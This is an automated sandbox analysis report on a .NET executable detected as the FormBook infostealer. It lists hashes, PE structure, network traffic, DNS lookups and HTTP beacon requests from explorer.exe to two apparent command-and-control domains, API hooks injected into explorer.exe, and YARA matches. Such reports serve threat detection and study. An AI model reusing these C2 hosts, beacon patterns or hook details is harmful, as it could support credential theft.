                                        SHA-512:77850814E24DB48E3DDF9DF5B6A8110EE1A823BAABA800F89CD353EAC7F72E48B13F3F4A4DC8E5F0FAA707A7F14ED90577CF1CB106A0422F0BEDD1EFD2E940E4
                                        Malicious:true
                                        Reputation:moderate, very likely benign file
                                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                        Static File Info

                                        General

                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Entropy (8bit):7.6744819259251145
                                        TrID:
                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                        • Win32 Executable (generic) a (10002005/4) 49.75%
                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                        • Windows Screen Saver (13104/52) 0.07%
                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                        File name:XhU4EXUp0x.exe
                                        File size:907264
                                        MD5:49c83eceb8a816b959a778e5f2e78801
                                        SHA1:ead9055c813de47edfec5bc46a0d896df4b4af2e
                                        SHA256:2f4d0e2ce90ab2c35dcba4c85e38346eae6ac2cef0f939ccdd21cade4d6343ca
                                        SHA512:09b42603c00de62fe0426f202a6809c0d7ed2164f6e3da1ab124a9d02e75eea115a2ad650905a2df4e9d9bbdb4347c4283eed1c161cfdf549713cbb46ca6a6d1
                                        SSDEEP:24576:EE4VwfX9zrNeBUdtEqTGokrWc4eJNPs2ruVc:EE4VwfX9PwBU8rWc5rGc
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`..............P.................. ........@.. .......................@............@................................

                                        File Icon

                                        Icon Hash:00828e8e8686b000

                                        Static PE Info

                                        General

                                        Entrypoint:0x4decea
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                        Time Stamp:0x60C3DF04 [Fri Jun 11 22:09:08 2021 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:v4.0.30319
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                        Entrypoint Preview

                                        Instruction
                                        jmp dword ptr [00402000h]
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al

                                        Data Directories

                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xdec980x4f.text
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xe00000x5dc.rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xe20000xc.reloc
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0xdeb600x1c.text
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                        Sections

                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        .text0x20000xdccf00xdce00False0.803978980971data7.68116376135IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                        .rsrc0xe00000x5dc0x600False0.426432291667data4.164077085IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .reloc0xe20000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                        Resources

                                        NameRVASizeTypeLanguageCountry
                                        RT_VERSION0xe00900x34cdata
                                        RT_MANIFEST0xe03ec0x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                        Imports

                                        DLLImport
                                        mscoree.dll_CorExeMain

                                        Version Infos

                                        DescriptionData
                                        Translation0x0000 0x04b0
                                        LegalCopyrightCopyright 2017
                                        Assembly Version1.0.0.0
                                        InternalNameProfileOptimization.exe
                                        FileVersion1.0.0.0
                                        CompanyName
                                        LegalTrademarks
                                        Comments
                                        ProductNameThinkCoffee
                                        ProductVersion1.0.0.0
                                        FileDescriptionThinkCoffee
                                        OriginalFilenameProfileOptimization.exe

                                        Network Behavior

                                        Network Port Distribution

                                        TCP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Jun 12, 2021 08:58:45.443835974 CEST4976280192.168.2.466.235.200.146
                                        Jun 12, 2021 08:58:45.486952066 CEST804976266.235.200.146192.168.2.4
                                        Jun 12, 2021 08:58:45.487123966 CEST4976280192.168.2.466.235.200.146
                                        Jun 12, 2021 08:58:45.487462997 CEST4976280192.168.2.466.235.200.146
                                        Jun 12, 2021 08:58:45.529809952 CEST804976266.235.200.146192.168.2.4
                                        Jun 12, 2021 08:58:45.999707937 CEST4976280192.168.2.466.235.200.146
                                        Jun 12, 2021 08:58:46.042366028 CEST804976266.235.200.146192.168.2.4
                                        Jun 12, 2021 08:58:46.042442083 CEST4976280192.168.2.466.235.200.146
                                        Jun 12, 2021 08:59:06.257075071 CEST4976580192.168.2.423.82.229.132
                                        Jun 12, 2021 08:59:06.451848030 CEST804976523.82.229.132192.168.2.4
                                        Jun 12, 2021 08:59:06.452025890 CEST4976580192.168.2.423.82.229.132
                                        Jun 12, 2021 08:59:06.452203989 CEST4976580192.168.2.423.82.229.132
                                        Jun 12, 2021 08:59:06.651827097 CEST804976523.82.229.132192.168.2.4
                                        Jun 12, 2021 08:59:06.651859045 CEST804976523.82.229.132192.168.2.4
                                        Jun 12, 2021 08:59:06.651873112 CEST804976523.82.229.132192.168.2.4
                                        Jun 12, 2021 08:59:06.651887894 CEST804976523.82.229.132192.168.2.4
                                        Jun 12, 2021 08:59:06.652347088 CEST4976580192.168.2.423.82.229.132
                                        Jun 12, 2021 08:59:06.652540922 CEST4976580192.168.2.423.82.229.132
                                        Jun 12, 2021 08:59:06.847349882 CEST804976523.82.229.132192.168.2.4

                                        UDP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Jun 12, 2021 08:57:05.901299000 CEST5315753192.168.2.48.8.8.8
                                        Jun 12, 2021 08:57:05.951527119 CEST53531578.8.8.8192.168.2.4
                                        Jun 12, 2021 08:57:06.667735100 CEST5802853192.168.2.48.8.8.8
                                        Jun 12, 2021 08:57:06.718683958 CEST53580288.8.8.8192.168.2.4
                                        Jun 12, 2021 08:57:07.914366961 CEST5309753192.168.2.48.8.8.8
                                        Jun 12, 2021 08:57:07.965502977 CEST53530978.8.8.8192.168.2.4
                                        Jun 12, 2021 08:57:08.203623056 CEST4925753192.168.2.48.8.8.8
                                        Jun 12, 2021 08:57:08.266376972 CEST53492578.8.8.8192.168.2.4
                                        Jun 12, 2021 08:57:09.575119019 CEST6238953192.168.2.48.8.8.8
                                        Jun 12, 2021 08:57:09.634443998 CEST53623898.8.8.8192.168.2.4
                                        Jun 12, 2021 08:57:10.707788944 CEST4991053192.168.2.48.8.8.8
                                        Jun 12, 2021 08:57:10.769614935 CEST53499108.8.8.8192.168.2.4
                                        Jun 12, 2021 08:57:11.819053888 CEST5585453192.168.2.48.8.8.8
                                        Jun 12, 2021 08:57:11.882215023 CEST53558548.8.8.8192.168.2.4
                                        Jun 12, 2021 08:57:12.799154043 CEST6454953192.168.2.48.8.8.8
                                        Jun 12, 2021 08:57:12.860248089 CEST53645498.8.8.8192.168.2.4
                                        Jun 12, 2021 08:57:13.952930927 CEST6315353192.168.2.48.8.8.8
                                        Jun 12, 2021 08:57:14.003428936 CEST53631538.8.8.8192.168.2.4
                                        Jun 12, 2021 08:57:14.747575045 CEST5299153192.168.2.48.8.8.8
                                        Jun 12, 2021 08:57:14.797682047 CEST53529918.8.8.8192.168.2.4
                                        Jun 12, 2021 08:57:15.725955009 CEST5370053192.168.2.48.8.8.8
                                        Jun 12, 2021 08:57:15.786371946 CEST53537008.8.8.8192.168.2.4
                                        Jun 12, 2021 08:57:16.712888956 CEST5172653192.168.2.48.8.8.8
                                        Jun 12, 2021 08:57:16.763209105 CEST53517268.8.8.8192.168.2.4
                                        Jun 12, 2021 08:57:17.877006054 CEST5679453192.168.2.48.8.8.8
                                        Jun 12, 2021 08:57:17.933020115 CEST53567948.8.8.8192.168.2.4
                                        Jun 12, 2021 08:57:19.560508013 CEST5653453192.168.2.48.8.8.8
                                        Jun 12, 2021 08:57:19.620259047 CEST53565348.8.8.8192.168.2.4
                                        Jun 12, 2021 08:57:20.493185043 CEST5662753192.168.2.48.8.8.8
                                        Jun 12, 2021 08:57:20.545531988 CEST53566278.8.8.8192.168.2.4
                                        Jun 12, 2021 08:57:21.318283081 CEST5662153192.168.2.48.8.8.8
                                        Jun 12, 2021 08:57:21.368737936 CEST53566218.8.8.8192.168.2.4
                                        Jun 12, 2021 08:57:22.212704897 CEST6311653192.168.2.48.8.8.8
                                        Jun 12, 2021 08:57:22.262896061 CEST53631168.8.8.8192.168.2.4
                                        Jun 12, 2021 08:57:23.036264896 CEST6407853192.168.2.48.8.8.8
                                        Jun 12, 2021 08:57:23.086296082 CEST53640788.8.8.8192.168.2.4
                                        Jun 12, 2021 08:57:23.833759069 CEST6480153192.168.2.48.8.8.8
                                        Jun 12, 2021 08:57:23.884001970 CEST53648018.8.8.8192.168.2.4
                                        Jun 12, 2021 08:57:24.777329922 CEST6172153192.168.2.48.8.8.8
                                        Jun 12, 2021 08:57:24.838646889 CEST53617218.8.8.8192.168.2.4
                                        Jun 12, 2021 08:57:25.728360891 CEST5125553192.168.2.48.8.8.8
                                        Jun 12, 2021 08:57:25.786494970 CEST53512558.8.8.8192.168.2.4
                                        Jun 12, 2021 08:57:35.281550884 CEST6152253192.168.2.48.8.8.8
                                        Jun 12, 2021 08:57:35.343091011 CEST53615228.8.8.8192.168.2.4
                                        Jun 12, 2021 08:57:58.055152893 CEST5233753192.168.2.48.8.8.8
                                        Jun 12, 2021 08:57:58.217106104 CEST53523378.8.8.8192.168.2.4
                                        Jun 12, 2021 08:57:59.370914936 CEST5504653192.168.2.48.8.8.8
                                        Jun 12, 2021 08:57:59.433738947 CEST53550468.8.8.8192.168.2.4
                                        Jun 12, 2021 08:58:00.118191004 CEST4961253192.168.2.48.8.8.8
                                        Jun 12, 2021 08:58:00.274250031 CEST53496128.8.8.8192.168.2.4
                                        Jun 12, 2021 08:58:00.799945116 CEST4928553192.168.2.48.8.8.8
                                        Jun 12, 2021 08:58:00.861430883 CEST53492858.8.8.8192.168.2.4
                                        Jun 12, 2021 08:58:01.438102007 CEST5060153192.168.2.48.8.8.8
                                        Jun 12, 2021 08:58:01.506112099 CEST53506018.8.8.8192.168.2.4
                                        Jun 12, 2021 08:58:01.673754930 CEST6087553192.168.2.48.8.8.8
                                        Jun 12, 2021 08:58:01.674573898 CEST5644853192.168.2.48.8.8.8
                                        Jun 12, 2021 08:58:01.727037907 CEST53608758.8.8.8192.168.2.4
                                        Jun 12, 2021 08:58:01.744715929 CEST53564488.8.8.8192.168.2.4
                                        Jun 12, 2021 08:58:02.097090006 CEST5917253192.168.2.48.8.8.8
                                        Jun 12, 2021 08:58:02.161220074 CEST53591728.8.8.8192.168.2.4
                                        Jun 12, 2021 08:58:02.846249104 CEST6242053192.168.2.48.8.8.8
                                        Jun 12, 2021 08:58:02.908121109 CEST53624208.8.8.8192.168.2.4
                                        Jun 12, 2021 08:58:03.773226023 CEST6057953192.168.2.48.8.8.8
                                        Jun 12, 2021 08:58:03.833061934 CEST53605798.8.8.8192.168.2.4
                                        Jun 12, 2021 08:58:08.391108036 CEST5018353192.168.2.48.8.8.8
                                        Jun 12, 2021 08:58:08.449613094 CEST53501838.8.8.8192.168.2.4
                                        Jun 12, 2021 08:58:08.876105070 CEST6153153192.168.2.48.8.8.8
                                        Jun 12, 2021 08:58:08.934951067 CEST53615318.8.8.8192.168.2.4
                                        Jun 12, 2021 08:58:17.089121103 CEST4922853192.168.2.48.8.8.8
                                        Jun 12, 2021 08:58:17.150459051 CEST53492288.8.8.8192.168.2.4
                                        Jun 12, 2021 08:58:45.281604052 CEST5979453192.168.2.48.8.8.8
                                        Jun 12, 2021 08:58:45.436830044 CEST53597948.8.8.8192.168.2.4
                                        Jun 12, 2021 08:58:56.410811901 CEST5591653192.168.2.48.8.8.8
                                        Jun 12, 2021 08:58:56.483880043 CEST53559168.8.8.8192.168.2.4
                                        Jun 12, 2021 08:58:58.555881023 CEST5275253192.168.2.48.8.8.8
                                        Jun 12, 2021 08:58:58.626697063 CEST53527528.8.8.8192.168.2.4
                                        Jun 12, 2021 08:59:06.180969000 CEST6054253192.168.2.48.8.8.8
                                        Jun 12, 2021 08:59:06.255776882 CEST53605428.8.8.8192.168.2.4

                                        DNS Queries

                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                        Jun 12, 2021 08:58:45.281604052 CEST192.168.2.48.8.8.80x2a48Standard query (0)www.gentrypartyof8.comA (IP address)IN (0x0001)
                                        Jun 12, 2021 08:59:06.180969000 CEST192.168.2.48.8.8.80x4b68Standard query (0)www.rsyueda.comA (IP address)IN (0x0001)

                                        DNS Answers

                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                        Jun 12, 2021 08:57:05.951527119 CEST8.8.8.8192.168.2.40x52b2No error (0)a-0019.a.dns.azurefd.neta-0019.standard.a-msedge.netCNAME (Canonical name)IN (0x0001)
                                        Jun 12, 2021 08:58:45.436830044 CEST8.8.8.8192.168.2.40x2a48No error (0)www.gentrypartyof8.comgentrypartyof8.comCNAME (Canonical name)IN (0x0001)
                                        Jun 12, 2021 08:58:45.436830044 CEST8.8.8.8192.168.2.40x2a48No error (0)gentrypartyof8.com66.235.200.146A (IP address)IN (0x0001)
                                        Jun 12, 2021 08:59:06.255776882 CEST8.8.8.8192.168.2.40x4b68No error (0)www.rsyueda.com23.82.229.132A (IP address)IN (0x0001)

                                        HTTP Request Dependency Graph

                                        • www.gentrypartyof8.com
                                        • www.rsyueda.com

                                        HTTP Packets

                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        0192.168.2.44976266.235.200.14680C:\Windows\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        Jun 12, 2021 08:58:45.487462997 CEST8357OUTGET /nff/?2dWD=oo8PZR09GamqRkCLHSTg5AKJvm44C+19X1uEOPW4zTuWS3c9RrL+Vx+B8IkF2PxixF5c&7nSX=f2MHEhOHwH HTTP/1.1
                                        Host: www.gentrypartyof8.com
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        1192.168.2.44976523.82.229.13280C:\Windows\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        Jun 12, 2021 08:59:06.452203989 CEST8377OUTGET /nff/?2dWD=rcekcafpraO0sj/oaoDcLlLwOdzHntpmaKyMQqwrcrTR8fOv+tmqTlrKj/r2WTcjy7/L&7nSX=f2MHEhOHwH HTTP/1.1
                                        Host: www.rsyueda.com
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        Jun 12, 2021 08:59:06.651827097 CEST8378INHTTP/1.1 500 Internal Server Error
                                        Cache-Control: private
                                        Content-Type: text/html; charset=utf-8
                                        Server: Microsoft-IIS/8.5
                                        X-AspNet-Version: 4.0.30319
                                        X-Powered-By: ASP.NET
                                        Access-Control-Allow-Origin: *
                                        Access-Control-Allow-Headers: *
                                        Access-Control-Allow-Methods: GET, POST, PUT, DELETE
                                        Date: Sat, 12 Jun 2021 06:59:03 GMT
                                        Connection: close
                                        Content-Length: 4082
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e e6 9c aa e5 b0 86 e5 af b9 e8 b1 a1 e5 bc 95 e7 94 a8 e8 ae be e7 bd ae e5 88 b0 e5 af b9 e8 b1 a1 e7 9a 84 e5 ae 9e e4 be 8b e3 80 82 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 2e 37 65 6d 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 0d 0a 20 20 20 20 20 20 20 20 20 70 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 2d 35 70 78 7d 0d 0a 20 20 20 20 20 20 20 20 20 62 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 2d 35 70 78 7d 0d 0a 20 20 20 20 20 20 20 20 20 48 31 20 7b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 70 74 3b 63 6f 6c 6f 72 3a 72 65 64 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 48 32 20 7b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 74 3b 63 6f 6c 6f 72 3a 6d 61 72 6f 6f 6e 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 70 72 65 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 43 6f 6e 73 6f 6c 61 73 22 2c 22 4c 75 63 69 64 61 20 43 6f 6e 73 6f 6c 65 22 2c 4d 6f 6e 6f 73 70 61 63 65 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 31 70 74 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 2e 35 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 34 70 74 7d 0d 0a 20 20 20 20 20 20 20 20 20 2e 6d 61 72 6b 65 72 20 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 20 63 6f 6c 6f 72 3a 20 62 6c 61 63 6b 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 7d 0d 0a 20 20 20 20 20 20 20 20 20 2e 76 65 72 73 69 6f 6e 20 7b 63 6f 6c 6f 72 3a 20 67 72 61 79 3b 7d 0d 0a 20 20 20 20 20 20 20 20 20 2e 65 72 72 6f 72 20 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 7d 0d 0a 20 20 20 20 20 20 20 20 20 2e 65 78 70 61 6e 64 61 62 6c 65 20 7b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 20 63 6f 6c 6f 72 3a 6e 61 76 79 3b 20
                                        Data Ascii: <!DOCTYPE html><html> <head> <title></title> <meta name="viewport" content="width=device-width" /> <style> body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;} p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px} b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px} H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red } H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon } pre {font-family:"Consolas","Lucida Console",Monospace;font-size:11pt;margin:0;padding:0.5em;line-height:14pt} .marker {font-weight: bold; color: black;text-decoration: none;} .version {color: gray;} .error {margin-bottom: 10px;} .expandable { text-decoration:underline; font-weight:bold; color:navy;


                                        Code Manipulations

                                        User Modules

                                        Hook Summary

                                        Function NameHook TypeActive in Processes
                                        PeekMessageAINLINEexplorer.exe
                                        PeekMessageWINLINEexplorer.exe
                                        GetMessageWINLINEexplorer.exe
                                        GetMessageAINLINEexplorer.exe

                                        Processes

                                        Process: explorer.exe, Module: user32.dll
                                        Function NameHook TypeNew Data
                                        PeekMessageAINLINE0x48 0x8B 0xB8 0x85 0x5E 0xE9
                                        PeekMessageWINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xE9
                                        GetMessageWINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xE9
                                        GetMessageAINLINE0x48 0x8B 0xB8 0x85 0x5E 0xE9

                                        Statistics

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        Analysis Process: XhU4EXUp0x.exe PID: 6968 Parent PID: 6016

                                        General

                                        Start time:08:57:11
                                        Start date:12/06/2021
                                        Path:C:\Users\user\Desktop\XhU4EXUp0x.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Users\user\Desktop\XhU4EXUp0x.exe'
                                        Imagebase:0x340000
                                        File size:907264 bytes
                                        MD5 hash:49C83ECEB8A816B959A778E5F2E78801
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.655856649.00000000037F7000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.655856649.00000000037F7000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.655856649.00000000037F7000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.654291332.00000000036B9000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.654291332.00000000036B9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.654291332.00000000036B9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.653535453.00000000026EF000.00000004.00000001.sdmp, Author: Joe Security
                                        Reputation:low

                                        Analysis Process: XhU4EXUp0x.exe PID: 6076 Parent PID: 6968

                                        General

                                        Start time:08:57:15
                                        Start date:12/06/2021
                                        Path:C:\Users\user\Desktop\XhU4EXUp0x.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\Desktop\XhU4EXUp0x.exe
                                        Imagebase:0xe60000
                                        File size:907264 bytes
                                        MD5 hash:49C83ECEB8A816B959A778E5F2E78801
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.707404802.00000000015D0000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.707404802.00000000015D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.707404802.00000000015D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.652221131.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.652221131.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
